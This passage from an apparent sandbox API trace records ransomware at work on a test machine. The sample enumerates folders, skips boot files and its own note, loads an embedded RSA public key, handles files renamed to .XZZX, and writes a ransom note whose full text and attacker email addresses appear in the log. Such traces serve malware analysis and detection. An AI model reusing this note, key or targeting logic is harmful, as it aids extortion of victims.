lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0254.005] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1420 [0254.005] Sleep (dwMilliseconds=0x96) [0254.160] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0254.160] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0254.160] lstrcmpW (lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpString2="..") returned 1 [0254.160] lstrcmpW (lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpString2=".") returned 1 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="ntldr") returned 0x0 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="NTLDR") returned 0x0 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0254.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0254.161] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0254.161] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.161] lstrcpyW (in: lpString1=0x17be7c, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0254.161] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0254.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1424 [0254.161] WaitForSingleObject (hHandle=0x1424, dwMilliseconds=0xffffffff) returned 0x0 [0254.162] Sleep (dwMilliseconds=0x96) [0254.317] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0254.317] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0254.317] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0254.317] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0254.317] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0254.317] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0254.317] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0254.317] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0254.317] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0254.317] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0254.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0254.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0254.317] SetErrorMode (uMode=0x1) returned 0x1 [0254.317] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT") returned 76 [0254.317] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0254.317] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0254.317] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1428) returned 0x0 [0254.317] RegQueryValueExW (in: hKey=0x1428, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43deb10, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43deb10*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0254.317] RegCloseKey (hKey=0x1428) returned 0x0 [0254.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0254.317] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0254.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1428 [0254.318] CloseHandle (hObject=0x1428) returned 1 [0254.318] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0254.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0254.318] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0254.318] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0254.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0254.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0254.318] SetErrorMode (uMode=0x1) returned 0x1 [0254.318] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0254.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.318] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0254.318] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0254.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0254.318] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0254.318] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.318] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="ntldr") returned 0x0 [0254.318] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="NTLDR") returned 0x0 [0254.318] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.318] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.318] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0254.318] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0254.318] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0254.318] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.318] lstrcpyW (in: lpString1=0x17addc, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0254.318] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1430 [0254.319] Sleep (dwMilliseconds=0x96) [0254.472] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0254.472] lstrcmpW (lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpString2="..") returned 1 [0254.472] lstrcmpW (lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpString2=".") returned 1 [0254.472] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.473] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="ntldr") returned 0x0 [0254.473] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="NTLDR") returned 0x0 [0254.473] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.473] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.473] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0254.473] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0254.473] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0254.473] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.473] lstrcpyW (in: lpString1=0x17addc, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0254.473] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1434 [0254.473] Sleep (dwMilliseconds=0x96) [0254.628] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0254.628] lstrcmpW (lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpString2="..") returned 1 [0254.628] lstrcmpW (lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpString2=".") returned 1 [0254.628] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.629] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="ntldr") returned 0x0 [0254.629] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="NTLDR") returned 0x0 [0254.629] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.629] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.629] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0254.629] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0254.629] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0254.629] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.629] lstrcpyW (in: lpString1=0x17addc, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0254.629] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1438 [0254.629] Sleep (dwMilliseconds=0x96) [0254.784] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0254.784] lstrcmpW (lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpString2="..") returned 1 [0254.784] lstrcmpW (lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpString2=".") returned 1 [0254.785] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.785] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="ntldr") returned 0x0 [0254.785] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="NTLDR") returned 0x0 [0254.785] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.785] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.785] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0254.785] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0254.785] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0254.785] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- 